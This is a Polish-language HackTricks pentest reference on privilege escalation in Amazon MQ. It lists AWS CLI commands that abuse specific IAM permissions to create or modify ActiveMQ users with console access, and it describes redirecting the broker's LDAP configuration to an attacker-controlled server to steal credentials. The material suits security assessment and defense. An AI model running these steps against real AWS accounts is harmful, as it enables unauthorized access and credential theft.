AWS - MQ Privesc

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

MQ

Aby uzyskać więcej informacji na temat MQ, sprawdź:

pageAWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Z tymi uprawnieniami możesz utworzyć nowego użytkownika w brokerze ActimeMQ (to nie działa w RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potencjalne skutki: Dostęp do wrażliwych informacji, poruszanie się po ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Z tymi uprawnieniami możesz utworzyć nowego użytkownika w brokerze ActimeMQ (to nie działa w RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potencjalne skutki: Dostęp do wrażliwych informacji, poruszanie się po ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Jeśli broker używa LDAP do autoryzacji z ActiveMQ, możliwe jest zmienienie konfiguracji serwera LDAP na taki kontrolowany przez atakującego. W ten sposób atakujący będzie mógł ukraść wszystkie poświadczenia przesyłane przez LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Jeśli somehow udałoby Ci się znaleźć oryginalne poświadczenia używane przez ActiveMQ, mógłbyś przeprowadzić atak typu MitM, ukraść poświadczenia, użyć ich w oryginalnym serwerze i wysłać odpowiedź (może wystarczyłoby ponownie wykorzystać ukradzione poświadczenia).

Potencjalne skutki: Kradzież poświadczeń ActiveMQ

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated